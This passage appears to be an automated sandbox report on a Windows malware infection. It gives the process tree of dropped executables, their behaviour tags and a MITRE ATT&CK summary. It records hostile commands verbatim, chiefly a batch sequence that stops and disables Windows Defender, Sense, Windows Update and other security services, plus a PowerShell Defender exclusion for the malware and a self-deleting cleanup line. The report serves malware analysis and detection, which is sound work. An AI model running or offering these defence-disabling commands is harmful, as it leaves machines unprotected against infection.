        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\rPRLfhZmwXu3oXGQaqju2XrO.exe" & exit
      C:\Windows\SysWOW64\timeout.exe (PID 7064)
          timeout /t 5
          - Delays execution with timeout.exe
  C:\Users\Admin\Documents\byxb49tCEP1SdejWYr15WvcH.exe (PID 5564)
      "C:\Users\Admin\Documents\byxb49tCEP1SdejWYr15WvcH.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\Documents\oKmnOrVPGDoDvSbzfd3Aw8I1.exe (PID 1868)
      "C:\Users\Admin\Documents\oKmnOrVPGDoDvSbzfd3Aw8I1.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\7725650.scr (PID 3060)
        "C:\Users\Admin\AppData\Roaming\7725650.scr" /S
        - Executes dropped EXE
    C:\Users\Admin\AppData\Roaming\5030357.scr (PID 2424)
        "C:\Users\Admin\AppData\Roaming\5030357.scr" /S
        - Executes dropped EXE
        - Adds Run key to start application
      C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe (PID 3504)
          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
          - Executes dropped EXE
    C:\Users\Admin\AppData\Roaming\3783178.scr (PID 5828)
        "C:\Users\Admin\AppData\Roaming\3783178.scr" /S
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    C:\Users\Admin\AppData\Roaming\2841347.scr (PID 5112)
        "C:\Users\Admin\AppData\Roaming\2841347.scr" /S
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
    C:\Users\Admin\AppData\Roaming\5964929.scr (PID 1248)
        "C:\Users\Admin\AppData\Roaming\5964929.scr" /S
        - Executes dropped EXE
C:\Windows\SysWOW64\WerFault.exe (PID 4660)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3872 -ip 3872
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 5224)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4544 -ip 4544
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 5296)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1288 -ip 1288
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\svchost.exe (PID 3172)
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    - Modifies data under HKEY_USERS
C:\Windows\system32\svchost.exe (PID 5616)
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\WerFault.exe (PID 5460)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6104 -ip 6104
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 5780)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4212 -ip 4212
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 3848)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6088 -ip 6088
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 4024)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6040 -ip 6040
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 1756)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6028 -ip 6028
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\svchost.exe (PID 6000)
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\Conhost.exe (PID 5796)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Executes dropped EXE
C:\Windows\SysWOW64\WerFault.exe (PID 6016)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5244 -ip 5244
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 6416)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 864 -ip 864
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 6796)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3012 -ip 3012
C:\Users\Admin\AppData\Local\Temp\E804.exe (PID 2824)
    C:\Users\Admin\AppData\Local\Temp\E804.exe
  C:\Users\Admin\AppData\Local\Temp\E804.exe (PID 4588)
      C:\Users\Admin\AppData\Local\Temp\E804.exe
      - Executes dropped EXE
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection
C:\Users\Admin\AppData\Local\Temp\F42B.exe (PID 4276)
    C:\Users\Admin\AppData\Local\Temp\F42B.exe
  C:\Users\Admin\AppData\Local\Temp\F42B.exe (PID 2044)
      C:\Users\Admin\AppData\Local\Temp\F42B.exe
  C:\Users\Admin\AppData\Local\Temp\F42B.exe (PID 2392)
      C:\Users\Admin\AppData\Local\Temp\F42B.exe
C:\Users\Admin\AppData\Local\Temp\2F8F.exe (PID 6036)
    C:\Users\Admin\AppData\Local\Temp\2F8F.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\AppData\Local\Temp\47DB.exe (PID 6880)
    C:\Users\Admin\AppData\Local\Temp\47DB.exe
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
  C:\Users\Admin\AppData\Local\Temp\47DB.exe (PID 1180)
      "C:\Users\Admin\AppData\Local\Temp\47DB.exe"
C:\Users\Admin\AppData\Local\Temp\53E2.exe (PID 1252)
    C:\Users\Admin\AppData\Local\Temp\53E2.exe
  C:\Windows\SysWOW64\WerFault.exe (PID 6028)
      C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 296
      - Executes dropped EXE
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 6664)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1252 -ip 1252
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\60E3.exe (PID 4452)
    C:\Users\Admin\AppData\Local\Temp\60E3.exe
  C:\Windows\SysWOW64\WerFault.exe (PID 2672)
      C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1424
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Users\Admin\AppData\Local\Temp\67D9.exe (PID 856)
    C:\Users\Admin\AppData\Local\Temp\67D9.exe
  C:\Windows\SysWOW64\WerFault.exe (PID 7160)
      C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 264
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 7092)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 856 -ip 856
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\7893.exe (PID 3132)
    C:\Users\Admin\AppData\Local\Temp\7893.exe
  C:\Windows\SysWOW64\WerFault.exe (PID 4276)
      C:\Windows\SysWOW64\WerFault.exe -u -p 3132 -s 264
      - Program crash
C:\Windows\SysWOW64\WerFault.exe (PID 3008)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3240 -ip 3240
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 3268)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1084 -ip 1084
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 3316)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4968 -ip 4968
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 5748)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3132 -ip 3132
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\9295.exe (PID 5668)
    C:\Users\Admin\AppData\Local\Temp\9295.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Windows\system32\rundll32.exe (PID 4668)
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe (PID 5884)
      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      - Loads dropped DLL
    C:\Windows\SysWOW64\WerFault.exe (PID 1612)
        C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 456
        - Program crash
        - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 452)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5884 -ip 5884
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\B1C6.exe (PID 2216)
    C:\Users\Admin\AppData\Local\Temp\B1C6.exe
  C:\Windows\SysWOW64\WerFault.exe (PID 4796)
      C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 268
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 3240)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4452 -ip 4452
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 1232)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2216 -ip 2216
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\WerFault.exe (PID 6020)
    C:\Windows\system32\WerFault.exe -pss -s 468 -p 6364 -ip 6364
C:\Windows\system32\msiexec.exe (PID 3712)
    C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
  C:\Windows\syswow64\MsiExec.exe (PID 2172)
      C:\Windows\syswow64\MsiExec.exe -Embedding BE56B2DEBCC89975EEDEE121D6DE2102 C
      - Loads dropped DLL
  C:\Windows\syswow64\MsiExec.exe (PID 5772)
      C:\Windows\syswow64\MsiExec.exe -Embedding 1D9000A54C00356DCA37BBBF16F33243
      - Blocklisted process makes network request
      - Loads dropped DLL
    C:\Windows\SysWOW64\taskkill.exe (PID 4056)
        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
        - Kills process with taskkill
  C:\Windows\syswow64\MsiExec.exe (PID 4144)
      C:\Windows\syswow64\MsiExec.exe -Embedding 4EB7BC6D8CEBC9912904D179EB02E4AF E Global\MSI0000
      - Loads dropped DLL
      - Drops file in Windows directory
  C:\Windows\syswow64\MsiExec.exe (PID 14800)
      C:\Windows\syswow64\MsiExec.exe -Embedding 4D7120E581943C9CC8F7E9CACDD1E3C3 C
  C:\Windows\syswow64\MsiExec.exe (PID 14972)
      C:\Windows\syswow64\MsiExec.exe -Embedding A7F1B1503E8F185DBD4774D155E4A7CF
  C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe (PID 15200)
      "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"
      - Drops startup file
      - Adds Run key to start application
    C:\ProgramData\main_signed1\main_signed1.exe (PID 4636)
        "C:\ProgramData\main_signed1\main_signed1.exe"
      C:\Users\Admin\AppData\Local\Temp\is-I1O9T.tmp\main_signed1.tmp (PID 444)
          "C:\Users\Admin\AppData\Local\Temp\is-I1O9T.tmp\main_signed1.tmp" /SL5="$1002D8,6001806,831488,C:\ProgramData\main_signed1\main_signed1.exe"
        C:\ProgramData\main_signed1\main_signed1.exe (PID 16176)
            "C:\ProgramData\main_signed1\main_signed1.exe" /VERYSILENT
          C:\Users\Admin\AppData\Local\Temp\is-9H0LA.tmp\main_signed1.tmp (PID 6448)
              "C:\Users\Admin\AppData\Local\Temp\is-9H0LA.tmp\main_signed1.tmp" /SL5="$1102D8,6001806,831488,C:\ProgramData\main_signed1\main_signed1.exe" /VERYSILENT
              - Suspicious use of FindShellTrayWindow
            C:\Users\Admin\AppData\Roaming\Wondershare Studio\WSHelper.exe (PID 1288)
                "C:\Users\Admin\AppData\Roaming\Wondershare Studio\WSHelper.exe"
              C:\Windows\SysWOW64\WerFault.exe (PID 16232)
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 644
                  - Program crash
                  - Checks processor information in registry
                  - Enumerates system info in registry
    C:\Users\Admin\AppData\Local\Temp\DebasedSeptenary_2021-09-28_19-42\DebasedSeptenary_2021-09-28_19-42.exe (PID 5152)
        "C:\Users\Admin\AppData\Local\Temp\DebasedSeptenary_2021-09-28_19-42\DebasedSeptenary_2021-09-28_19-42.exe"
      C:\Windows\SysWOW64\WerFault.exe (PID 6640)
          C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 292
          - Program crash
          - Checks processor information in registry
          - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 6056)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 16204 -ip 16204
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 1088)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6128 -ip 6128
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exe (PID 5724)
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe (PID 4032)
      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      - Loads dropped DLL
    C:\Windows\SysWOW64\WerFault.exe (PID 5044)
        C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 456
        - Program crash
        - Checks processor information in registry
        - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 3724)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4032 -ip 4032
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\CompPkgSrv.exe (PID 3700)
    C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe (PID 8072)
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe (PID 10976)
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    - Drops file in Windows directory
C:\Windows\system32\svchost.exe (PID 11016)
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe (PID 11004)
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\System32\svchost.exe (PID 13288)
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\1CCA.exe (PID 13728)
    C:\Users\Admin\AppData\Local\Temp\1CCA.exe
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
  C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\AdvancedRun.exe (PID 13836)
      "C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    C:\Windows\system32\cmd.exe (PID 13904)
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\test.bat"
      C:\Windows\system32\sc.exe (PID 13952)
          sc stop windefend
      C:\Windows\system32\sc.exe (PID 13972)
          sc config windefend start= disabled
      C:\Windows\system32\sc.exe (PID 13988)
          sc stop Sense
      C:\Windows\system32\sc.exe (PID 14004)
          sc config Sense start= disabled
      C:\Windows\system32\sc.exe (PID 14020)
          sc stop wuauserv
      C:\Windows\system32\sc.exe (PID 14036)
          sc config wuauserv start= disabled
      C:\Windows\system32\sc.exe (PID 14048)
          sc stop usosvc
      C:\Windows\system32\sc.exe (PID 14064)
          sc config usosvc start= disabled
      C:\Windows\system32\sc.exe (PID 14080)
          sc stop WaasMedicSvc
      C:\Windows\system32\sc.exe (PID 14096)
          sc config WaasMedicSvc start= disabled
      C:\Windows\system32\sc.exe (PID 14112)
          sc stop SecurityHealthService
      C:\Windows\system32\sc.exe (PID 14128)
          sc config SecurityHealthService start= disabled
      C:\Windows\system32\sc.exe (PID 14144)
          sc stop SDRSVC
      C:\Windows\system32\sc.exe (PID 14160)
          sc config SDRSVC start= disabled
      C:\Windows\system32\sc.exe (PID 14176)
          sc stop wscsvc
      C:\Windows\system32\sc.exe (PID 14208)
          sc config wscsvc start= disabled
      C:\Windows\system32\sc.exe (PID 14224)
          sc stop WdiServiceHost
      C:\Windows\system32\sc.exe (PID 14240)
          sc config WdiServiceHost start= disabled
      C:\Windows\system32\sc.exe (PID 14256)
          sc stop WdiSystemHost
      C:\Windows\system32\sc.exe (PID 14272)
          sc config WdiSystemHost start= disabled
      C:\Windows\system32\sc.exe (PID 14288)
          sc stop InstallService
      C:\Windows\system32\sc.exe (PID 14304)
          sc config InstallService Start= disabled
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 14332)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1CCA.exe" -Force
  C:\Users\Admin\AppData\Local\Temp\1CCA.exe (PID 14344)
      "C:\Users\Admin\AppData\Local\Temp\1CCA.exe"
  C:\Windows\SysWOW64\WerFault.exe (PID 14532)
      C:\Windows\SysWOW64\WerFault.exe -u -p 13728 -s 2448
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 14488)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 13728 -ip 13728
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\3C3A.exe (PID 14712)
    C:\Users\Admin\AppData\Local\Temp\3C3A.exe
    - Enumerates connected drives
  C:\Windows\SysWOW64\msiexec.exe (PID 14864)
      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3C3A.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862242 " AI_EUIMSI=""
      - Enumerates connected drives
      - Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Local\Temp\46BA.exe (PID 15136)
    C:\Users\Admin\AppData\Local\Temp\46BA.exe
  C:\Windows\SysWOW64\WerFault.exe (PID 15276)
      C:\Windows\SysWOW64\WerFault.exe -u -p 15136 -s 288
      - Program crash
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 15256)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 15136 -ip 15136
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\5794.exe (PID 15376)
    C:\Users\Admin\AppData\Local\Temp\5794.exe
  C:\Users\Admin\AppData\Local\Temp\is-1UP47.tmp\5794.tmp (PID 15400)
      "C:\Users\Admin\AppData\Local\Temp\is-1UP47.tmp\5794.tmp" /SL5="$C0340,4844586,831488,C:\Users\Admin\AppData\Local\Temp\5794.exe"
    C:\Users\Admin\AppData\Local\Temp\5794.exe (PID 15436)
        "C:\Users\Admin\AppData\Local\Temp\5794.exe" /VERYSILENT
      C:\Users\Admin\AppData\Local\Temp\is-MFD39.tmp\5794.tmp (PID 15464)
          "C:\Users\Admin\AppData\Local\Temp\is-MFD39.tmp\5794.tmp" /SL5="$D0340,4844586,831488,C:\Users\Admin\AppData\Local\Temp\5794.exe" /VERYSILENT
          - Suspicious use of FindShellTrayWindow
        C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe (PID 15524)
            "C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe"
C:\Windows\SysWOW64\WerFault.exe (PID 16368)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1288 -ip 1288
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe (PID 3668)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5152 -ip 5152
    - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\svchost.exe (PID 4456)
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe (PID 7460)
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\B161.exe (PID 7816)
    C:\Users\Admin\AppData\Local\Temp\B161.exe
  C:\Windows\SysWOW64\WerFault.exe (PID 2072)
      C:\Windows\SysWOW64\WerFault.exe -u -p 7816 -s 204
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe (PID 2100)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 7816 -ip 7816
    - Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
- BITS Jobs (1)
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- BITS Jobs (1)
- Disabling Security Tools (4)
- Impair Defenses (1)
- Install Root Certificate (1)
- Modify Registry (6)
- Virtualization/Sandbox Evasion (1)
- Web Service (1)